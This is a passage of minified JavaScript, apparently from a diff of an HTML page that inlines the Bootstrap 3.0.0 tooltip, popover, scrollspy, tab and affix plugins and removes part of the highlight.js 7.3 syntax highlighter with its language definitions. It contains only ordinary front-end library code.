focus",title:"",delay:0,html:!1,container:!1},b.prototype.init=function(b,c,d){this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d);for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var h="hover"==g?"mouseenter":"focus",i="hover"==g?"mouseleave":"blur";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},b.prototype.getDefaults=function(){return b.DEFAULTS},b.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},b.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},b.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type);return clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show),void 0):c.show()},b.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type);return clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide),void 0):c.hide()},b.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){if(this.$element.trigger(b),b.isDefaultPrevented())return;var c=this.tip();this.setContent(),this.options.animation&&c.addClass("fade");var d="function"==typeof this.options.placement?this.options.placement.call(this,c[0],this.$element[0]):this.options.placement,e=/\s?auto?\s?/i,f=e.test(d);f&&(d=d.replace(e,"")||"top"),c.detach().css({top:0,left:0,display:"block"}).addClass(d),this.options.container?c.appendTo(this.options.container):c.insertAfter(this.$element);var g=this.getPosition(),h=c[0].offsetWidth,i=c[0].offsetHeight;if(f){var j=this.$element.parent(),k=d,l=document.documentElement.scrollTop||document.body.scrollTop,m="body"==this.options.container?window.innerWidth:j.outerWidth(),n="body"==this.options.container?window.innerHeight:j.outerHeight(),o="body"==this.options.container?0:j.offset().left;d="bottom"==d&&g.top+g.height+i-l>n?"top":"top"==d&&g.top-l-i<0?"bottom":"right"==d&&g.right+h>m?"left":"left"==d&&g.left-h<o?"right":d,c.removeClass(k).addClass(d)}var p=this.getCalculatedOffset(d,g,h,i);this.applyPlacement(p,d),this.$element.trigger("shown.bs."+this.type)}},b.prototype.applyPlacement=function(a,b){var c,d=this.tip(),e=d[0].offsetWidth,f=d[0].offsetHeight,g=parseInt(d.css("margin-top"),10),h=parseInt(d.css("margin-left"),10);isNaN(g)&&(g=0),isNaN(h)&&(h=0),a.top=a.top+g,a.left=a.left+h,d.offset(a).addClass("in");var i=d[0].offsetWidth,j=d[0].offsetHeight;if("top"==b&&j!=f&&(c=!0,a.top=a.top+f-j),/bottom|top/.test(b)){var k=0;a.left<0&&(k=-2*a.left,a.left=0,d.offset(a),i=d[0].offsetWidth,j=d[0].offsetHeight),this.replaceArrow(k-e+i,i,"left")}else this.replaceArrow(j-f,j,"top");c&&d.offset(a)},b.prototype.replaceArrow=function(a,b,c){this.arrow().css(c,a?50*(1-a/b)+"%":"")},b.prototype.setContent=function(){var a=this.tip(),b=this.getTitle();a.find(".tooltip-inner")[this.options.html?"html":"text"](b),a.removeClass("fade in top bottom left right")},b.prototype.hide=function(){function b(){"in"!=c.hoverState&&d.detach()}var c=this,d=this.tip(),e=a.Event("hide.bs."+this.type);return this.$element.trigger(e),e.isDefaultPrevented()?void 0:(d.removeClass("in"),a.support.transition&&this.$tip.hasClass("fade")?d.one(a.support.transition.end,b).emulateTransitionEnd(150):b(),this.$element.trigger("hidden.bs."+this.type),this)},b.prototype.fixTitle=function(){var a=this.$element;(a.attr("title")||"string"!=typeof a.attr("data-original-title"))&&a.attr("data-original-title",a.attr("title")||"").attr("title","")},b.prototype.hasContent=function(){return this.getTitle()},b.prototype.getPosition=function(){var b=this.$element[0];return a.extend({},"function"==typeof b.getBoundingClientRect?b.getBoundingClientRect():{width:b.offsetWidth,height:b.offsetHeight},this.$element.offset())},b.prototype.getCalculatedOffset=function(a,b,c,d){return"bottom"==a?{top:b.top+b.height,left:b.left+b.width/2-c/2}:"top"==a?{top:b.top-d,left:b.left+b.width/2-c/2}:"left"==a?{top:b.top+b.height/2-d/2,left:b.left-c}:{top:b.top+b.height/2-d/2,left:b.left+b.width}},b.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},b.prototype.tip=function(){return this.$tip=this.$tip||a(this.options.template)},b.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},b.prototype.validate=function(){this.$element[0].parentNode||(this.hide(),this.$element=null,this.options=null)},b.prototype.enable=function(){this.enabled=!0},b.prototype.disable=function(){this.enabled=!1},b.prototype.toggleEnabled=function(){this.enabled=!this.enabled},b.prototype.toggle=function(b){var c=b?a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type):this;c.tip().hasClass("in")?c.leave(c):c.enter(c)},b.prototype.destroy=function(){this.hide().$element.off("."+this.type).removeData("bs."+this.type)};var c=a.fn.tooltip;a.fn.tooltip=function(c){return this.each(function(){var d=a(this),e=d.data("bs.tooltip"),f="object"==typeof c&&c;e||d.data("bs.tooltip",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.tooltip.Constructor=b,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=c,this}}(window.jQuery),+function(a){"use strict";var b=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires tooltip.js");b.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:'<div class="popover"><div class="arrow"></div><h3 class="popover-title"></h3><div class="popover-content"></div></div>'}),b.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),b.prototype.constructor=b,b.prototype.getDefaults=function(){return b.DEFAULTS},b.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content")[this.options.html?"html":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},b.prototype.hasContent=function(){return this.getTitle()||this.getContent()},b.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},b.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")},b.prototype.tip=function(){return this.$tip||(this.$tip=a(this.options.template)),this.$tip};var c=a.fn.popover;a.fn.popover=function(c){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof c&&c;e||d.data("bs.popover",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.popover.Constructor=b,a.fn.popover.noConflict=function(){return a.fn.popover=c,this}}(window.jQuery),+function(a){"use strict";function b(c,d){var e,f=a.proxy(this.process,this);this.$element=a(c).is("body")?a(window):a(c),this.$body=a("body"),this.$scrollElement=this.$element.on("scroll.bs.scroll-spy.data-api",f),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||(e=a(c).attr("href"))&&e.replace(/.*(?=#[^\s]+$)/,"")||"")+" .nav li > a",this.offsets=a([]),this.targets=a([]),this.activeTarget=null,this.refresh(),this.process()}b.DEFAULTS={offset:10},b.prototype.refresh=function(){var b=this.$element[0]==window?"offset":"position";this.offsets=a([]),this.targets=a([]);var c=this;this.$body.find(this.selector).map(function(){var d=a(this),e=d.data("target")||d.attr("href"),f=/^#\w/.test(e)&&a(e);return f&&f.length&&[[f[b]().top+(!a.isWindow(c.$scrollElement.get(0))&&c.$scrollElement.scrollTop()),e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){c.offsets.push(this[0]),c.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.$scrollElement[0].scrollHeight||this.$body[0].scrollHeight,d=c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(b>=d)return g!=(a=f.last()[0])&&this.activate(a);for(a=e.length;a--;)g!=f[a]&&b>=e[a]&&(!e[a+1]||b<=e[a+1])&&this.activate(f[a])},b.prototype.activate=function(b){this.activeTarget=b,a(this.selector).parents(".active").removeClass("active");var c=this.selector+'[data-target="'+b+'"],'+this.selector+'[href="'+b+'"]',d=a(c).parents("li").addClass("active");d.parent(".dropdown-menu").length&&(d=d.closest("li.dropdown").addClass("active")),d.trigger("activate")};var c=a.fn.scrollspy;a.fn.scrollspy=function(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.scrollspy.Constructor=b,a.fn.scrollspy.noConflict=function(){return a.fn.scrollspy=c,this},a(window).on("load",function(){a('[data-spy="scroll"]').each(function(){var b=a(this);b.scrollspy(b.data())})})}(window.jQuery),+function(a){"use strict";var b=function(b){this.element=a(b)};b.prototype.show=function(){var b=this.element,c=b.closest("ul:not(.dropdown-menu)"),d=b.attr("data-target");if(d||(d=b.attr("href"),d=d&&d.replace(/.*(?=#[^\s]*$)/,"")),!b.parent("li").hasClass("active")){var e=c.find(".active:last a")[0],f=a.Event("show.bs.tab",{relatedTarget:e});if(b.trigger(f),!f.isDefaultPrevented()){var g=a(d);this.activate(b.parent("li"),c),this.activate(g,g.parent(),function(){b.trigger({type:"shown.bs.tab",relatedTarget:e})})}}},b.prototype.activate=function(b,c,d){function e(){f.removeClass("active").find("> .dropdown-menu > .active").removeClass("active"),b.addClass("active"),g?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu")&&b.closest("li.dropdown").addClass("active"),d&&d()}var f=c.find("> .active"),g=d&&a.support.transition&&f.hasClass("fade");g?f.one(a.support.transition.end,e).emulateTransitionEnd(150):e(),f.removeClass("in")};var c=a.fn.tab;a.fn.tab=function(c){return this.each(function(){var d=a(this),e=d.data("bs.tab");e||d.data("bs.tab",e=new b(this)),"string"==typeof c&&e[c]()})},a.fn.tab.Constructor=b,a.fn.tab.noConflict=function(){return a.fn.tab=c,this},a(document).on("click.bs.tab.data-api",'[data-toggle="tab"], [data-toggle="pill"]',function(b){b.preventDefault(),a(this).tab("show")})}(window.jQuery),+function(a){"use strict";var b=function(c,d){this.options=a.extend({},b.DEFAULTS,d),this.$window=a(window).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(c),this.affixed=this.unpin=null,this.checkPosition()};b.RESET="affix affix-top affix-bottom",b.DEFAULTS={offset:0},b.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},b.prototype.checkPosition=function(){if(this.$element.is(":visible")){var c=a(document).height(),d=this.$window.scrollTop(),e=this.$element.offset(),f=this.options.offset,g=f.top,h=f.bottom;"object"!=typeof f&&(h=g=f),"function"==typeof g&&(g=f.top()),"function"==typeof h&&(h=f.bottom());var i=null!=this.unpin&&d+this.unpin<=e.top?!1:null!=h&&e.top+this.$element.height()>=c-h?"bottom":null!=g&&g>=d?"top":!1;this.affixed!==i&&(this.unpin&&this.$element.css("top",""),this.affixed=i,this.unpin="bottom"==i?e.top-d:null,this.$element.removeClass(b.RESET).addClass("affix"+(i?"-"+i:"")),"bottom"==i&&this.$element.offset({top:document.body.offsetHeight-h-this.$element.height()}))}};var c=a.fn.affix;a.fn.affix=function(c){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof c&&c;e||d.data("bs.affix",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.affix.Constructor=b,a.fn.affix.noConflict=function(){return a.fn.affix=c,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var b=a(this),c=b.data();c.offset=c.offset||{},c.offsetBottom&&(c.offset.bottom=c.offsetBottom),c.offsetTop&&(c.offset.top=c.offsetTop),b.affix(c)})})}(window.jQuery);</script>
-<!-- END extlib/js/bootstrap-3.0.0.min.js -->
-<!-- START extlib/js/highlight-7.3.pack.min.js -->
-<script type="text/javascript">/* highlight.js Copyright (c) 2006, Ivan Sagalaev. Licensed under BSD 3-clause.
-   See https://github.com/isagalaev/highlight.js/blob/master/LICENSE */
-var hljs=new function(){function l(o){return o.replace(/&/gm,"&amp;").replace(/</gm,"&lt;").replace(/>/gm,"&gt;")}function b(p){for(var o=p.firstChild;o;o=o.nextSibling){if(o.nodeName=="CODE"){return o}if(!(o.nodeType==3&&o.nodeValue.match(/\s+/))){break}}}function h(p,o){return Array.prototype.map.call(p.childNodes,function(q){if(q.nodeType==3){return o?q.nodeValue.replace(/\n/g,""):q.nodeValue}if(q.nodeName=="BR"){return"\n"}return h(q,o)}).join("")}function a(q){var p=(q.className+" "+q.parentNode.className).split(/\s+/);p=p.map(function(r){return r.replace(/^language-/,"")});for(var o=0;o<p.length;o++){if(e[p[o]]||p[o]=="no-highlight"){return p[o]}}}function c(q){var o=[];(function p(r,s){for(var t=r.firstChild;t;t=t.nextSibling){if(t.nodeType==3){s+=t.nodeValue.length}else{if(t.nodeName=="BR"){s+=1}else{if(t.nodeType==1){o.push({event:"start",offset:s,node:t});s=p(t,s);o.push({event:"stop",offset:s,node:t})}}}}return s})(q,0);return o}function j(x,v,w){var p=0;var y="";var r=[];function t(){if(x.length&&v.length){if(x[0].offset!=v[0].offset){return(x[0].offset<v[0].offset)?x:v}else{return v[0].event=="start"?x:v}}else{return x.length?x:v}}function s(A){function z(B){return" "+B.nodeName+'="'+l(B.value)+'"'}return"<"+A.nodeName+Array.prototype.map.call(A.attributes,z).join("")+">"}while(x.length||v.length){var u=t().splice(0,1)[0];y+=l(w.substr(p,u.offset-p));p=u.offset;if(u.event=="start"){y+=s(u.node);r.push(u.node)}else{if(u.event=="stop"){var o,q=r.length;do{q--;o=r[q];y+=("</"+o.nodeName.toLowerCase()+">")}while(o!=u.node);r.splice(q,1);while(q<r.length){y+=s(r[q]);q++}}}}return y+l(w.substr(p))}function f(q){function o(s,r){return RegExp(s,"m"+(q.cI?"i":"")+(r?"g":""))}function p(y,w){if(y.compiled){return}y.compiled=true;var s=[];if(y.k){var r={};function z(A,t){t.split(" ").forEach(function(B){var C=B.split("|");r[C[0]]=[A,C[1]?Number(C[1]):1];s.push(C[0])})}y.lR=o(y.l||hljs.IR,true);if(typeof y.k=="string"){z("keyword",y.k)}else{for(var x in y.k){if(!y.k.hasOwnProperty(x)){continue}z(x,y.k[x])}}y.k=r}if(w){if(y.bWK){y.b="\\b("+s.join("|")+")\\s"}y.bR=o(y.b?y.b:"\\B|\\b");if(!y.e&&!y.eW){y.e="\\B|\\b"}if(y.e){y.eR=o(y.e)}y.tE=y.e||"";if(y.eW&&w.tE){y.tE+=(y.e?"|":"")+w.tE}}if(y.i){y.iR=o(y.i)}if(y.r===undefined){y.r=1}if(!y.c){y.c=[]}for(var v=0;v<y.c.length;v++){if(y.c[v]=="self"){y.c[v]=y}p(y.c[v],y)}if(y.starts){p(y.starts,w)}var u=[];for(var v=0;v<y.c.length;v++){u.push(y.c[v].b)}if(y.tE){u.push(y.tE)}if(y.i){u.push(y.i)}y.t=u.length?o(u.join("|"),true):{exec:function(t){return null}}}p(q)}function d(D,E){function o(r,M){for(var L=0;L<M.c.length;L++){var K=M.c[L].bR.exec(r);if(K&&K.index==0){return M.c[L]}}}function s(K,r){if(K.e&&K.eR.test(r)){return K}if(K.eW){return s(K.parent,r)}}function t(r,K){return K.i&&K.iR.test(r)}function y(L,r){var K=F.cI?r[0].toLowerCase():r[0];return L.k.hasOwnProperty(K)&&L.k[K]}function G(){var K=l(w);if(!A.k){return K}var r="";var N=0;A.lR.lastIndex=0;var L=A.lR.exec(K);while(L){r+=K.substr(N,L.index-N);var M=y(A,L);if(M){v+=M[1];r+='<span class="'+M[0]+'">'+L[0]+"</span>"}else{r+=L[0]}N=A.lR.lastIndex;L=A.lR.exec(K)}return r+K.substr(N)}function z(){if(A.sL&&!e[A.sL]){return l(w)}var r=A.sL?d(A.sL,w):g(w);if(A.r>0){v+=r.keyword_count;B+=r.r}return'<span class="'+r.language+'">'+r.value+"</span>"}function J(){return A.sL!==undefined?z():G()}function I(L,r){var K=L.cN?'<span class="'+L.cN+'">':"";if(L.rB){x+=K;w=""}else{if(L.eB){x+=l(r)+K;w=""}else{x+=K;w=r}}A=Object.create(L,{parent:{value:A}});B+=L.r}function C(K,r){w+=K;if(r===undefined){x+=J();return 0}var L=o(r,A);if(L){x+=J();I(L,r);return L.rB?0:r.length}var M=s(A,r);if(M){if(!(M.rE||M.eE)){w+=r}x+=J();do{if(A.cN){x+="</span>"}A=A.parent}while(A!=M.parent);if(M.eE){x+=l(r)}w="";if(M.starts){I(M.starts,"")}return M.rE?0:r.length}if(t(r,A)){throw"Illegal"}w+=r;return r.length||1}var F=e[D];f(F);var A=F;var w="";var B=0;var v=0;var x="";try{var u,q,p=0;while(true){A.t.lastIndex=p;u=A.t.exec(E);if(!u){break}q=C(E.substr(p,u.index-p),u[0]);p=u.index+q}C(E.substr(p));return{r:B,keyword_count:v,value:x,language:D}}catch(H){if(H=="Illegal"){return{r:0,keyword_count:0,value:l(E)}}else{throw H}}}function g(s){var o={keyword_count:0,r:0,value:l(s)};var q=o;for(var p in e){if(!e.hasOwnProperty(p)){continue}var r=d(p,s);r.language=p;if(r.keyword_count+r.r>q.keyword_count+q.r){q=r}if(r.keyword_count+r.r>o.keyword_count+o.r){q=o;o=r}}if(q.language){o.second_best=q}return o}function i(q,p,o){if(p){q=q.replace(/^((<[^>]+>|\t)+)/gm,function(r,v,u,t){return v.replace(/\t/g,p)})}if(o){q=q.replace(/\n/g,"<br>")}return q}function m(r,u,p){var v=h(r,p);var t=a(r);if(t=="no-highlight"){return}var w=t?d(t,v):g(v);t=w.language;var o=c(r);if(o.length){var q=document.createElement("pre");q.innerHTML=w.value;w.value=j(o,c(q),v)}w.value=i(w.value,u,p);var s=r.className;if(!s.match("(\\s|^)(language-)?"+t+"(\\s|$)")){s=s?(s+" "+t):t}r.innerHTML=w.value;r.className=s;r.result={language:t,kw:w.keyword_count,re:w.r};if(w.second_best){r.second_best={language:w.second_best.language,kw:w.second_best.keyword_count,re:w.second_best.r}}}function n(){if(n.called){return}n.called=true;Array.prototype.map.call(document.getElementsByTagName("pre"),b).filter(Boolean).forEach(function(o){m(o,hljs.tabReplace)})}function k(){window.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}var e={};this.LANGUAGES=e;this.highlight=d;this.highlightAuto=g;this.fixMarkup=i;this.highlightBlock=m;this.initHighlighting=n;this.initHighlightingOnLoad=k;this.IR="[a-zA-Z][a-zA-Z0-9_]*";this.UIR="[a-zA-Z_][a-zA-Z0-9_]*";this.NR="\\b\\d+(\\.\\d+)?";this.CNR="(\\b0[xX][a-fA-F0-9]+|(\\b\\d+(\\.\\d*)?|\\.\\d+)([eE][-+]?\\d+)?)";this.BNR="\\b(0b[01]+)";this.RSR="!|!=|!==|%|%=|&|&&|&=|\\*|\\*=|\\+|\\+=|,|\\.|-|-=|/|/=|:|;|<|<<|<<=|<=|=|==|===|>|>=|>>|>>=|>>>|>>>=|\\?|\\[|\\{|\\(|\\^|\\^=|\\||\\|=|\\|\\||~";this.BE={b:"\\\\[\\s\\S]",r:0};this.ASM={cN:"string",b:"'",e:"'",i:"\\n",c:[this.BE],r:0};this.QSM={cN:"string",b:'"',e:'"',i:"\\n",c:[this.BE],r:0};this.CLCM={cN:"comment",b:"//",e:"$"};this.CBLCLM={cN:"comment",b:"/\\*",e:"\\*/"};this.HCM={cN:"comment",b:"#",e:"$"};this.NM={cN:"number",b:this.NR,r:0};this.CNM={cN:"number",b:this.CNR,r:0};this.BNM={cN:"number",b:this.BNR,r:0};this.inherit=function(q,r){var o={};for(var p in q){o[p]=q[p]}if(r){for(var p in r){o[p]=r[p]}}return o}}();hljs.LANGUAGES.bash=function(a){var g="true false";var e="if then else elif fi for break continue while in do done echo exit return set declare";var c={cN:"variable",b:"\\$[a-zA-Z0-9_#]+"};var b={cN:"variable",b:"\\${([^}]|\\\\})+}"};var h={cN:"string",b:'"',e:'"',i:"\\n",c:[a.BE,c,b],r:0};var d={cN:"string",b:"'",e:"'",c:[{b:"''"}],r:0};var f={cN:"test_condition",b:"",e:"",c:[h,d,c,b],k:{literal:g},r:0};return{k:{keyword:e,literal:g},c:[{cN:"shebang",b:"(#!\\/bin\\/bash)|(#!\\/bin\\/sh)",r:10},c,b,a.HCM,h,d,a.inherit(f,{b:"\\[ ",e:" \\]",r:0}),a.inherit(f,{b:"\\[\\[ ",e:" \\]\\]"})]}}(hljs);hljs.LANGUAGES.cs=function(a){return{k:"abstract as base bool break byte case catch char checked class const continue decimal default delegate do double else enum event explicit extern false finally fixed float for foreach goto if implicit in int interface internal is lock long namespace new null object operator out override params private protected public readonly ref return sbyte sealed short sizeof stackalloc static string struct switch this throw true try typeof uint ulong unchecked unsafe ushort using virtual volatile void while ascending descending from get group into join let orderby partial select set value var where yield",c:[{cN:"comment",b:"///",e:"$",rB:true,c:[{cN:"xmlDocTag",b:"///|<!--|-->"},{cN:"xmlDocTag",b:"</?",e:">"}]},a.CLCM,a.CBLCLM,{cN:"preprocessor",b:"#",e:"$",k:"if else elif endif define undef warning error line region endregion pragma checksum"},{cN:"string",b:'@"',e:'"',c:[{b:'""'}]},a.ASM,a.QSM,a.CNM]}}(hljs);hljs.LANGUAGES.ruby=function(e){var a="[a-zA-Z_][a-zA-Z0-9_]*(\\!|\\?)?";var j="[a-zA-Z_]\\w*[!?=]?|[-+~]\\@|<<|>>|=~|===?|<=>|[<>]=?|\\*\\*|[-/+%^&*~`|]|\\[\\]=?";var g={keyword:"and false then defined module in return redo if BEGIN retry end for true self when next until do begin unless END rescue nil else break undef not super class case require yield alias while ensure elsif or include"};var c={cN:"yardoctag",b:"@[A-Za-z]+"};var k=[{cN:"comment",b:"#",e:"$",c:[c]},{cN:"comment",b:"^\\=begin",e:"^\\=end",c:[c],r:10},{cN:"comment",b:"^__END__",e:"\\n$"}];var d={cN:"subst",b:"#\\{",e:"}",l:a,k:g};var i=[e.BE,d];var b=[{cN:"string",b:"'",e:"'",c:i,r:0},{cN:"string",b:'"',e:'"',c:i,r:0},{cN:"string",b:"%[qw]?\\(",e:"\\)",c:i},{cN:"string",b:"%[qw]?\\[",e:"\\]",c:i},{cN:"string",b:"%[qw]?{",e:"}",c:i},{cN:"string",b:"%[qw]?<",e:">",c:i,r:10},{cN:"string",b:"%[qw]?/",e:"/",c:i,r:10},{cN:"string",b:"%[qw]?%",e:"%",c:i,r:10},{cN:"string",b:"%[qw]?-",e:"-",c:i,r:10},{cN:"string",b:"%[qw]?\\|",e:"\\|",c:i,r:10}];var h={cN:"function",bWK:true,e:" |$|;",k:"def",c:[{cN:"title",b:j,l:a,k:g},{cN:"params",b:"\\(",e:"\\)",l:a,k:g}].concat(k)};var f=k.concat(b.concat([{cN:"class",bWK:true,e:"$|;",k:"class module",c:[{cN:"title",b:"[A-Za-z_]\\w*(::\\w+)*(\\?|\\!)?",r:0},{cN:"inheritance",b:"<\\s*",c:[{cN:"parent",b:"("+e.IR+"::)?"+e.IR}]}].concat(k)},h,{cN:"constant",b:"(::)?(\\b[A-Z]\\w*(::)?)+",r:0},{cN:"symbol",b:":",c:b.concat([{b:j}]),r:0},{cN:"symbol",b:a+":",r:0},{cN:"number",b:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",r:0},{cN:"number",b:"\\?\\w"},{cN:"variable",b:"(\\$\\W)|((\\$|\\@\\@?)(\\w+))"},{b:"("+e.RSR+")\\s*",c:k.concat([{cN:"regexp",b:"/",e:"/[a-z]*",i:"\\n",c:[e.BE,d]}]),r:0}]));d.c=f;h.c[1].c=f;return{l:a,k:g,c:f}}(hljs);hljs.LANGUAGES.javascript=function(a){return{k:{keyword:"in if for while finally var new function do return void else break catch instanceof with throw case default try this switch continue typeof delete let yield const",literal:"true false null undefined NaN Infinity"},c:[a.ASM,a.QSM,a.CLCM,a.CBLCLM,a.CNM,{b:"("+a.RSR+"|\\b(case|return|throw)\\b)\\s*",k:"return throw case",c:[a.CLCM,a.CBLCLM,{cN:"regexp",b:"/",e:"/[gim]*",i:"\\n",c:[{b:"\\\\/"}]},{b:"<",e:">;",sL:"xml"}],r:0},{cN:"function",bWK:true,e:"{",k:"function",c:[{cN:"title",b:"[A-Za-z$_][0-9A-Za-z$_]*"},{cN:"params",b:"\\(",e:"\\)",c:[a.CLCM,a.CBLCLM],i:"[\"'\\(]"}],i:"\\[|%"}]}}(hljs);hljs.LANGUAGES.xml=function(a){var c="[A-Za-z0-9\\._:-]+";var b={eW:true,c:[{cN:"attribute",b:c,r:0},{b:'="',rB:true,e:'"',c:[{cN:"value",b:'"',eW:true}]},{b:"='",rB:true,e:"'",c:[{cN:"value",b:"'",eW:true}]},{b:"=",c:[{cN:"value",b:"[^\\s/>]+"}]}]};return{cI:true,c:[{cN:"pi",b:"<\\?",e:"\\?>",r:10},{cN:"doctype",b:"<!DOCTYPE",e:">",r:10,c:[{b:"\\[",e:"\\]"}]},{cN:"comment",b:"<!--",e:"-->",r:10},{cN:"cdata",b:"<\\!\\[CDATA\\[",e:"\\]\\]>",r:10},{cN:"tag",b:"<style(?=\\s|>|$)",e:">",k:{title:"style"},c:[b],starts:{e:"</style>",rE:true,sL:"css"}},{cN:"tag",b:"<script(?=\\s|>|$)",e:">",k:{title:"script"},c:[b],starts:{e:"<\/script>",rE:true,sL:"javascript"}},{b:"",sL:"vbscript"},{cN:"tag",b:"</?",e:"/?>",c:[{cN:"title",b:"[^ />]+"},b]}]}}(hljs);hljs.LANGUAGES.markdown=function(a){return{c:[{cN:"header",b:"^#{1,3}",e:"$"},{cN:"header",b:"^.+?\\n[=-]{2,}$"},{b:"<",e:">",sL:"xml",r:0},{cN:"bullet",b:"^([*+-]|(\\d+\\.))\\s+"},{cN:"strong",b:"[*_]{2}.+?[*_]{2}"},{cN:"emphasis",b:"\\*.+?\\*"},{cN:"emphasis",b:"_.+?_",r:0},{cN:"blockquote",b:"^>\\s+",e:"$"},{cN:"code",b:"`.+?`"},{cN:"code",b:"^    ",e:"$",r:0},{cN:"horizontal_rule",b:"^-{3,}",e:"$"},{b:"\\[.+?\\]\\(.+?\\)",rB:true,c:[{cN:"link_label",b:"\\[.+\\]"},{cN:"link_url",b:"\\(",e:"\\)",eB:true,eE:true}]}]}}(hljs);hljs.LANGUAGES.css=function(a){var b={cN:"function",b:a.IR+"\\(",e:"\\)",c:[a.NM,a.ASM,a.QSM]};return{cI:true,i:"[=/|']",c:[a.CBLCLM,{cN:"id",b:"\\#[A-Za-z0-9_-]+"},{cN:"class",b:"\\.[A-Za-z0-9_-]+",r:0},{cN:"attr_selector",b:"\\[",e:"\\]",i:"$"},{cN:"pseudo",b:":(:)?[a-zA-Z0-9\\_\\-\\+\\(\\)\\\"\\']+"},{cN:"at_rule",b:"@(font-face|page)",l:"[a-z-]+",k:"font-face page"},{cN:"at_rule",b:"@",e:"[{;]",eE:true,k:"import page media charset",c:[b,a.ASM,a.QSM,a.NM]},{cN:"tag",b:a.IR,r:0},{cN:"rules",b:"{",e:"}",i:"[^\\s]",r:0,c:[a.CBLCLM,{cN:"rule",b:"[^\\s]",rB:true,e:";",eW:true,c:[{cN:"attribute",b:"[A-Z\\_\\.\\-]+",e:":",eE:true,i:"[^\\s]",starts:{cN:"value",eW:true,eE:true,c:[b,a.NM,a.QSM,a.ASM,a.CBLCLM,{cN:"hexcolor",b:"\\#[0-9A-F]+"},{cN:"important",b:"!important"}]}}]}]}]}}(hljs);hljs.LANGUAGES.http=function(a){return{i:"\\S",c:[{cN:"status",b:"^HTTP/[0-9\\.]+",e:"$",c:[{cN:"number",b:"\\b\\d{3}\\b"}]},{cN:"request",b:"^[A-Z]+ (.*?) HTTP/[0-9\\.]+$",rB:true,e:"$",c:[{cN:"string",b:" ",e:" ",eB:true,eE:true}]},{cN:"attribute",b:"^\\w",e:": ",eE:true,i:"\\n|\\s|=",starts:{cN:"string",e:"$"}},{b:"\\n\\n",starts:{sL:"",eW:true}}]}}(hljs);hljs.LANGUAGES.java=function(a){return{k:"false synchronized int abstract float private char boolean static null if const for true while long throw strictfp finally protected import native final return void enum else break transient new catch instanceof byte super volatile case assert short package default double public try this switch continue throws",c:[{cN:"javadoc",b:"/\\*\\*",e:"\\*/",c:[{cN:"javadoctag",b:"@[A-Za-z]+"}],r:10},a.CLCM,a.CBLCLM,a.ASM,a.QSM,{cN:"class",bWK:true,e:"{",k:"class interface",i:":",c:[{bWK:true,k:"extends implements",r:10},{cN:"title",b:a.UIR}]},a.CNM,{cN:"annotation",b:"@[A-Za-z]+"}]}}(hljs);hljs.LANGUAGES.php=function(a){var e={cN:"variable",b:"\\$+[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*"};var b=[a.inherit(a.ASM,{i:null}),a.inherit(a.QSM,{i:null}),{cN:"string",b:'b"',e:'"',c:[a.BE]},{cN:"string",b:"b'",e:"'",c:[a.BE]}];var 